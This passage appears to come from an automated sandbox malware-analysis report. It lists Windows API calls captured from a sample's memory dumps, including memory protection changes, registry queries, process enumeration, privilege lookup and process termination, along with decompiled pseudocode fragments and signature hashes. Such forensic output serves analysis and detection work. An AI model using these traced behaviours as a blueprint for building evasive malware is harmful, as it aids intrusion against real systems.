                                                                                                                        • VirtualFree.KERNELBASE(?,?,00004000,89FFFFFF,00000000,00401DAE,00000000,00405657,00000000,?,?,?,?,?,00401DAE,?), ref: 004052CB
                                                                                                                        • VirtualProtect.KERNEL32(89FFFFFF,?,?,?,89FFFFFF,00000000,00401DAE,00000000,00405657,00000000,?,?,?,?,?,00401DAE), ref: 00405319
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$FreeProtect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2581862158-0
                                                                                                                        • Opcode ID: c1edb189bbda30892c842c09c5d68adf0fdf97aaff2b83fca045691814e5b23a
                                                                                                                        • Instruction ID: 0a94071d5bad9c92eea86807c628c656e595f13d7ac2fbc0b4d5d5519bfedb09
                                                                                                                        • Opcode Fuzzy Hash: c1edb189bbda30892c842c09c5d68adf0fdf97aaff2b83fca045691814e5b23a
                                                                                                                        • Instruction Fuzzy Hash: 9C21CF716006028BDB18DF04D994ABBB3A6EF84344F44816EEE06AB385E774EC11CFA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E0041665D(void* __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                        				signed char _t28;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				short* _t31;
                                                                                                                        				signed int _t36;
                                                                                                                        				void* _t39;
                                                                                                                        				intOrPtr _t40;
                                                                                                                        				signed int _t43;
                                                                                                                        				intOrPtr* _t44;
                                                                                                                        				intOrPtr _t48;
                                                                                                                        				intOrPtr _t49;
                                                                                                                        				intOrPtr _t50;
                                                                                                                        				signed int _t51;
                                                                                                                        				signed int _t53;
                                                                                                                        				intOrPtr _t57;
                                                                                                                        				signed int _t59;
                                                                                                                        
                                                                                                                        				_t49 = __edi;
                                                                                                                        				_t39 = __ebx;
                                                                                                                        				 *((intOrPtr*)(_t59 + 0x50561c43)) =  *((intOrPtr*)(_t59 + 0x50561c43)) + __ecx;
                                                                                                                        				E0040E430(__edi);
                                                                                                                        				_t43 =  *(_t59 - 0x1c) * 0x30;
                                                                                                                        				 *((intOrPtr*)(_t59 - 0x20)) = __esi;
                                                                                                                        				_t53 = _t43 + 0x422d38;
                                                                                                                        				 *(_t59 - 0x1c) = _t53;
                                                                                                                        				L7:
                                                                                                                        				while( *_t53 != 0) {
                                                                                                                        					_t28 =  *(_t53 + 1);
                                                                                                                        					if(_t28 != 0) {
                                                                                                                        						_t51 =  *_t53 & 0x000000ff;
                                                                                                                        						_t36 = _t28 & 0x000000ff;
                                                                                                                        						while(_t51 <= _t36) {
                                                                                                                        							 *(_t39 + _t51 + 0x1d) =  *(_t39 + _t51 + 0x1d) |  *( *((intOrPtr*)(_t59 - 0x20)) + 0x422d24);
                                                                                                                        							_t36 =  *(_t53 + 1) & 0x000000ff;
                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                        						}
                                                                                                                        						_t49 =  *((intOrPtr*)(_t59 + 8));
                                                                                                                        						_t53 = _t53 + 2;
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				 *((intOrPtr*)(_t59 - 0x20)) =  *((intOrPtr*)(_t59 - 0x20)) + 1;
                                                                                                                        				_t53 =  *(_t59 - 0x1c) + 8;
                                                                                                                        				 *(_t59 - 0x1c) = _t53;
                                                                                                                        				if( *((intOrPtr*)(_t59 - 0x20)) < 4) {
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				 *((intOrPtr*)(_t39 + 4)) = _t49;
                                                                                                                        				 *((intOrPtr*)(_t39 + 8)) = 1;
                                                                                                                        				_t30 = E00416238(_t49);
                                                                                                                        				 *((intOrPtr*)(_t39 + 0xc)) = _t30;
                                                                                                                        				_t31 = _t39 + 0x10;
                                                                                                                        				_t44 = _t43 + 0x422d2c;
                                                                                                                        				_t48 = 6;
                                                                                                                        				do {
                                                                                                                        					 *_t31 =  *_t44;
                                                                                                                        					_t44 = _t44 + 2;
                                                                                                                        					_t31 = _t31 + 2;
                                                                                                                        					_t48 = _t48 - 1;
                                                                                                                        				} while (_t48 != 0);
                                                                                                                        				E004162CB(_t39); // executed
                                                                                                                        				_pop(_t50);
                                                                                                                        				_pop(_t57);
                                                                                                                        				_pop(_t40);
                                                                                                                        				return E00415C0B(0, _t40,  *(_t59 - 4) ^ _t59, _t48, _t50, _t57);
                                                                                                                        			}


















                                                                                                                        0x0041665d
                                                                                                                        0x0041665d
                                                                                                                        0x0041665d
                                                                                                                        0x00416663
                                                                                                                        0x0041666e
                                                                                                                        0x00416671
                                                                                                                        0x00416674
                                                                                                                        0x0041667a
                                                                                                                        0x00000000
                                                                                                                        0x004166a9
                                                                                                                        0x0041667f
                                                                                                                        0x00416684
                                                                                                                        0x00416686
                                                                                                                        0x00416689
                                                                                                                        0x004166a0
                                                                                                                        0x00416697
                                                                                                                        0x0041669b
                                                                                                                        0x0041669f
                                                                                                                        0x0041669f
                                                                                                                        0x004166a4
                                                                                                                        0x004166a8
                                                                                                                        0x00000000
                                                                                                                        0x004166a8
                                                                                                                        0x00000000
                                                                                                                        0x00416684
                                                                                                                        0x004166b1
                                                                                                                        0x004166b4
                                                                                                                        0x004166bb
                                                                                                                        0x004166be
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004166c2
                                                                                                                        0x004166c5
                                                                                                                        0x004166cc
                                                                                                                        0x004166d3
                                                                                                                        0x004166d6
                                                                                                                        0x004166d9
                                                                                                                        0x004166df
                                                                                                                        0x004166e0
                                                                                                                        0x004166e4
                                                                                                                        0x004166e7
                                                                                                                        0x004166e9
                                                                                                                        0x004166ea
                                                                                                                        0x004166ea
                                                                                                                        0x004166ef
                                                                                                                        0x00416757
                                                                                                                        0x00416758
                                                                                                                        0x0041675b
                                                                                                                        0x00416762

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102423945-0
                                                                                                                        • Opcode ID: 39065a068736e76c3efdf8235f2fb7d7c9676008a4b4721518f13685da5c04e9
                                                                                                                        • Instruction ID: 1f6627891fddab4b7c16134ceeea49fa190dd0176e421cdeda56aed5aae009c5
                                                                                                                        • Opcode Fuzzy Hash: 39065a068736e76c3efdf8235f2fb7d7c9676008a4b4721518f13685da5c04e9
                                                                                                                        • Instruction Fuzzy Hash: FE110430C142548BCF168F15C8401FEBBB1EF45304B1A409FD8866F243D639C993CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 43%
                                                                                                                        			E00416616(void* __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                        				void* _t28;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				intOrPtr _t37;
                                                                                                                        				intOrPtr _t39;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				signed int _t43;
                                                                                                                        
                                                                                                                        				_t37 = __edi;
                                                                                                                        				_t28 = __ebx;
                                                                                                                        				 *((intOrPtr*)(_t43 + 0x50561c43)) =  *((intOrPtr*)(_t43 + 0x50561c43)) + __ecx;
                                                                                                                        				E0040E430(__edi);
                                                                                                                        				 *((intOrPtr*)(__ebx + 4)) = _t37;
                                                                                                                        				 *((intOrPtr*)(__ebx + 0xc)) = __esi;
                                                                                                                        				if( *((intOrPtr*)(_t43 - 0x18)) <= 1) {
                                                                                                                        					 *((intOrPtr*)(__ebx + 8)) = __esi;
                                                                                                                        				} else {
                                                                                                                        					if( *((char*)(__ebp - 0x12)) != 0) {
                                                                                                                        						__esi = __ebp - 0x11;
                                                                                                                        						while(1) {
                                                                                                                        							__cl =  *__esi;
                                                                                                                        							if(__cl == 0) {
                                                                                                                        								goto L10;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__esi - 1) & 0x000000ff;
                                                                                                                        							__ecx = __cl & 0x000000ff;
                                                                                                                        							while(__eax <= __ecx) {
                                                                                                                        								 *(__ebx + __eax + 0x1d) =  *(__ebx + __eax + 0x1d) | 0x00000004;
                                                                                                                        								__eax = __eax + 1;
                                                                                                                        							}
                                                                                                                        							__esi = __esi + 1;
                                                                                                                        							__esi = __esi + 1;
                                                                                                                        							if( *(__esi - 1) != 0) {
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        							goto L10;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L10:
                                                                                                                        					__eax = __ebx + 0x1e;
                                                                                                                        					__ecx = 0xfe;
                                                                                                                        					do {
                                                                                                                        						 *__eax =  *__eax | 0x00000008;
                                                                                                                        						__eax = __eax + 1;
                                                                                                                        						__ecx = __ecx - 1;
                                                                                                                        					} while (__ecx != 0);
                                                                                                                        					__eax =  *(__ebx + 4);
                                                                                                                        					 *((intOrPtr*)(__ebx + 0xc)) = E00416238( *(__ebx + 4));
                                                                                                                        					 *((intOrPtr*)(__ebx + 8)) = __edx;
                                                                                                                        				}
                                                                                                                        				asm("stosd");
                                                                                                                        				asm("stosd");
                                                                                                                        				asm("stosd");
                                                                                                                        				E004162CB(_t28); // executed
                                                                                                                        				_pop(_t39);
                                                                                                                        				_pop(_t42);
                                                                                                                        				_pop(_t29);
                                                                                                                        				return E00415C0B(0, _t29,  *(_t43 - 4) ^ _t43, 1, _t39, _t42);
                                                                                                                        			}









                                                                                                                        0x00416616
                                                                                                                        0x00416616
                                                                                                                        0x00416616
                                                                                                                        0x0041661c
                                                                                                                        0x00416627
                                                                                                                        0x0041662a
                                                                                                                        0x00416630
                                                                                                                        0x0041672e
                                                                                                                        0x00416636
                                                                                                                        0x0041663a
                                                                                                                        0x00416640
                                                                                                                        0x00416643
                                                                                                                        0x00416643
                                                                                                                        0x00416647
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0041664d
                                                                                                                        0x00416651
                                                                                                                        0x004166ff
                                                                                                                        0x004166f9
                                                                                                                        0x004166fe
                                                                                                                        0x004166fe
                                                                                                                        0x00416703
                                                                                                                        0x00416704
                                                                                                                        0x00416709
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00416709
                                                                                                                        0x00416643
                                                                                                                        0x0041670f
                                                                                                                        0x0041670f
                                                                                                                        0x00416712
                                                                                                                        0x00416717
                                                                                                                        0x00416717
                                                                                                                        0x0041671a
                                                                                                                        0x0041671b
                                                                                                                        0x0041671b
                                                                                                                        0x0041671e
                                                                                                                        0x00416726
                                                                                                                        0x00416729
                                                                                                                        0x00416729
                                                                                                                        0x00416740
                                                                                                                        0x00416741
                                                                                                                        0x00416742
                                                                                                                        0x004166ef
                                                                                                                        0x00416757
                                                                                                                        0x00416758
                                                                                                                        0x0041675b
                                                                                                                        0x00416762

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102423945-0
                                                                                                                        • Opcode ID: 20c6c8f03ad4f86aaf26395f958b91e6fff1ea9379615a342a02eccd45a835c8
                                                                                                                        • Instruction ID: 7d8934ea712daa1cab583a8d4690521aea4c9d33033a53be2298b2cef1a92bb2
                                                                                                                        • Opcode Fuzzy Hash: 20c6c8f03ad4f86aaf26395f958b91e6fff1ea9379615a342a02eccd45a835c8
                                                                                                                        • Instruction Fuzzy Hash: A111C8708041908FEB199F29C4913B9BFE0AF05309F2984AFDD919F286D27CC986D795
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 925de4a0040eb5957f1e0bdae8c3219deaf3c85756a52bf12efa9fc0c47c0c17
                                                                                                                        • Instruction ID: f424b77b4fad3c564a58634256bc06c58a9378b9a5dac67f90d1f7c8dd94d62a
                                                                                                                        • Opcode Fuzzy Hash: 925de4a0040eb5957f1e0bdae8c3219deaf3c85756a52bf12efa9fc0c47c0c17
                                                                                                                        • Instruction Fuzzy Hash: 6FE22730B883468FD70697BC985476ABBE29F86310F1480B7D548DF3A6EA79DC46C712
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616161154.00000000012B2000.00000040.00000001.sdmp, Offset: 012B2000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 1Fr<
                                                                                                                        • API String ID: 0-799200857
                                                                                                                        • Opcode ID: 5bd39fbf3d7752552436f93ee6b3413a5aaeeb8a17b6baeea23bbb77b11012b2
                                                                                                                        • Instruction ID: 6adcca1065547618900db2c541e550bc23c5d835df5a225bf4290f35d926f2b0
                                                                                                                        • Opcode Fuzzy Hash: 5bd39fbf3d7752552436f93ee6b3413a5aaeeb8a17b6baeea23bbb77b11012b2
                                                                                                                        • Instruction Fuzzy Hash: 82D1A2B156E3D2CFCB079B3468E45D43F79DB233A474D40EBC6858F5A3E218680A8766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,00000E30), ref: 012BB809
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        • Opcode ID: fd16fe7622b11e5a4fa96f0093b73f654eeb21d4af6ed7d15cdbc63d95641aa6
                                                                                                                        • Instruction ID: 234e3fd2a72d03d2a8d9cdb76c49367e480d203df8cc34d158d09091d0d6c172
                                                                                                                        • Opcode Fuzzy Hash: fd16fe7622b11e5a4fa96f0093b73f654eeb21d4af6ed7d15cdbc63d95641aa6
                                                                                                                        • Instruction Fuzzy Hash: 513194725097846FE7228B25CC85FA6BFBCEF06710F08849BE981DB153D264A909C771
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA886
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1082081703-0
                                                                                                                        • Opcode ID: dd28fae33097614c99c0cbdb013edc34e89c76f14c1c099d0c399c52c9ad57bc
                                                                                                                        • Instruction ID: ce4b896ef69b229cdfac45f0190fa4bde23a8cc07e71ea713fcc689d0bc53eda
                                                                                                                        • Opcode Fuzzy Hash: dd28fae33097614c99c0cbdb013edc34e89c76f14c1c099d0c399c52c9ad57bc
                                                                                                                        • Instruction Fuzzy Hash: F521E6725097806FD7128B25DC85BA6BFB8EF46320F0884AAE985DF153D224A949C771
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BB90C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 1ec0eb7910bb0c99cecc025ae51ec88fd7545995d20920915e65a1ab9611ead5
                                                                                                                        • Instruction ID: 47fa5eb89484bb9621c6a94607c5962a82135613756eb0106a3a78aaf218b3d1
                                                                                                                        • Opcode Fuzzy Hash: 1ec0eb7910bb0c99cecc025ae51ec88fd7545995d20920915e65a1ab9611ead5
                                                                                                                        • Instruction Fuzzy Hash: FD3191751097846FE722CB25CC85FA2BFE8EF06710F08849AE985CB153D264E549CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CertGetCertificateChain.CRYPT32(?,00000E30,?,?), ref: 012BBC52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: CertCertificateChain
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3019455780-0
                                                                                                                        • Opcode ID: 82321663ff2eaa8c93cde053b3b166ed70c81e778021c1e55e472a0223e80cf7
                                                                                                                        • Instruction ID: 53e55c7ebdfa8cdf7a200bf7b0a998f62d50565e082581aa303049800a1bd2c0
                                                                                                                        • Opcode Fuzzy Hash: 82321663ff2eaa8c93cde053b3b166ed70c81e778021c1e55e472a0223e80cf7
                                                                                                                        • Instruction Fuzzy Hash: C8316D7154E3C05FD7138B25CC55B66BFB4EF87610F0980DBD9848F2A3E624A919C7A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BBB4C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 560597551-0
                                                                                                                        • Opcode ID: aff2418f10f5d3afa14b95e27d0ca34aeaa9bd1b1b4693b3fe419d19f904e7fe
                                                                                                                        • Instruction ID: eadeb76e0c2722bc87e5da6cfde66faa8e26ad73bbb6f2e6ed8b7966bd86b636
                                                                                                                        • Opcode Fuzzy Hash: aff2418f10f5d3afa14b95e27d0ca34aeaa9bd1b1b4693b3fe419d19f904e7fe
                                                                                                                        • Instruction Fuzzy Hash: 8B2171715093C15FEB138B259C95BA6BFB8EF47320F0884DBE984DF193D264A948C761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindNextFileW.KERNEL32(?,00000E30,?,?), ref: 012BA1C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2029273394-0
                                                                                                                        • Opcode ID: 6b3787e3d510d9db682df0155b90d6613175cea901a93980b643656c6c2fc497
                                                                                                                        • Instruction ID: ac7e7cde86b93f32c1a8c410155d063f30383131abb666023501c8f7cbcaf597
                                                                                                                        • Opcode Fuzzy Hash: 6b3787e3d510d9db682df0155b90d6613175cea901a93980b643656c6c2fc497
                                                                                                                        • Instruction Fuzzy Hash: A721807140D3C05FD7138B758C55B62BFB4EF87610F0985DBD9848F193D229A919C762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA976
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3425974696-0
                                                                                                                        • Opcode ID: 5fbeb4cfddf3aeab635c0b3efd4cc8641eadacd927b3b7f82b3f4ea9abca4f25
                                                                                                                        • Instruction ID: ae7dda47aed859ca16ccd86f1ef332751a722673b37c8c1812152fa3381aea81
                                                                                                                        • Opcode Fuzzy Hash: 5fbeb4cfddf3aeab635c0b3efd4cc8641eadacd927b3b7f82b3f4ea9abca4f25
                                                                                                                        • Instruction Fuzzy Hash: DD21E571505780AFE712CF25CC85FA6BFF8EF46310F0884AAE985DB152D264E848CB71
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E30,?,?), ref: 012BAA82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 514040917-0
                                                                                                                        • Opcode ID: c6fa958221b7905c0f7eac82b2715778e4ba39e90792262ca8098d2da6b89a2f
                                                                                                                        • Instruction ID: da9e1a96b2378c40263071bca5fd9d199ee38e8e6d4ff4fd9510db05f59d7fcf
                                                                                                                        • Opcode Fuzzy Hash: c6fa958221b7905c0f7eac82b2715778e4ba39e90792262ca8098d2da6b89a2f
                                                                                                                        • Instruction Fuzzy Hash: AE21AD7140A3C06FD3128B65CC55F66BFB8EF87610F0980DBD8848B1A3D624A909CBB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,?,?), ref: 012BBEA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 47c71dc804b79ac6654d7cb639007fdf18f37e77e47940dbccf1f27e6cec97f7
                                                                                                                        • Instruction ID: 289e15d0c5cedb299196e44a3f74b7c32057d23e98dd8a53a372c920b38c117b
                                                                                                                        • Opcode Fuzzy Hash: 47c71dc804b79ac6654d7cb639007fdf18f37e77e47940dbccf1f27e6cec97f7
                                                                                                                        • Instruction Fuzzy Hash: E121B6755093C06FD3138B25DC51B62BFB8EF87A10F0981DBE9848B653D225A919C7B2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?,00000E30), ref: 012BAF93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: a83d5306da5c6a6d033e8f0f4f423dfe98430afad2702a6cd5658aff33a81716
                                                                                                                        • Instruction ID: 71ddc08c5766bace0c6b43e63b8d36dc7a58cb7b4853263c417269db28eeddb4
                                                                                                                        • Opcode Fuzzy Hash: a83d5306da5c6a6d033e8f0f4f423dfe98430afad2702a6cd5658aff33a81716
                                                                                                                        • Instruction Fuzzy Hash: FB210A714093806FE7228B25DC85FA2BFB8EF47710F0884DEE9848F193D265A949C762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,00000E30), ref: 012BB809
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        • Opcode ID: 52fecfc18407ac3129db203eedcd958673f863d72d87f2c7b89582d8fa76d5d0
                                                                                                                        • Instruction ID: 622a04794a04a466725a93644f9d41035103bb7fd2525b07e8b198bafbfe37d1
                                                                                                                        • Opcode Fuzzy Hash: 52fecfc18407ac3129db203eedcd958673f863d72d87f2c7b89582d8fa76d5d0
                                                                                                                        • Instruction Fuzzy Hash: 9D21A172500604AFE7218F69DC85FAAFBECEF08710F08856AEA459B241D674E508CAB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BB90C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 69db59d69e9cacc6b87621b662743499d98a6cb825bf36978b5d5afdc541c926
                                                                                                                        • Instruction ID: aa28d4b04456e3485cf4d94d8a3ab223d2f0b55f8b336b9382499153ba443738
                                                                                                                        • Opcode Fuzzy Hash: 69db59d69e9cacc6b87621b662743499d98a6cb825bf36978b5d5afdc541c926
                                                                                                                        • Instruction Fuzzy Hash: 4A218E75610604AFEB21CF1ADC85FA6BBE8EF04720F08846AEA49CB251D760E548CA71
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA6B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        • Opcode ID: f07cb562e4b9f34b447301674d2c95a395ac6b8843ae0104358c41bbda8f20cf
                                                                                                                        • Instruction ID: f2a0ca881f4f460882dc17bc933765453c7f62e8cfbc6860d3966ab3e1603b8d
                                                                                                                        • Opcode Fuzzy Hash: f07cb562e4b9f34b447301674d2c95a395ac6b8843ae0104358c41bbda8f20cf
                                                                                                                        • Instruction Fuzzy Hash: DC21C3725093C05FDB038B25DC95792BFB4AF43324F0D80DAED858F263D265A908CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA976
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3425974696-0
                                                                                                                        • Opcode ID: 2113b9de5aa169afb5ded4a6da322936a539825ec36e039e800b6daa51f37a4d
                                                                                                                        • Instruction ID: 39b31cf87fc7b444b730ee10601d9f9f98a678e58f7cfc374155d772cf941290
                                                                                                                        • Opcode Fuzzy Hash: 2113b9de5aa169afb5ded4a6da322936a539825ec36e039e800b6daa51f37a4d
                                                                                                                        • Instruction Fuzzy Hash: 0C118175500700AFEB21CF2ADC85FA6BBE8EF44720F04846AEE45DB251D674E808CA71
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • MkParseDisplayName.OLE32(?,00000E30,?,?), ref: 012BB9FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DisplayNameParse
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3580041360-0
                                                                                                                        • Opcode ID: 87f8f3d7c8268533cd8270f943c71361f5a68c14915e9c4b1d295cd8c200a571
                                                                                                                        • Instruction ID: c4e0279d35f41c2564c804ff8e2095604de43e1e20a94c9ec3df66ac05ba5bf1
                                                                                                                        • Opcode Fuzzy Hash: 87f8f3d7c8268533cd8270f943c71361f5a68c14915e9c4b1d295cd8c200a571
                                                                                                                        • Instruction Fuzzy Hash: 1621D5715093C06FC312CB25CC45F62BFB8EF87610F0881CBE8848B653D224B915CBA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012BA3E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                        • String ID:
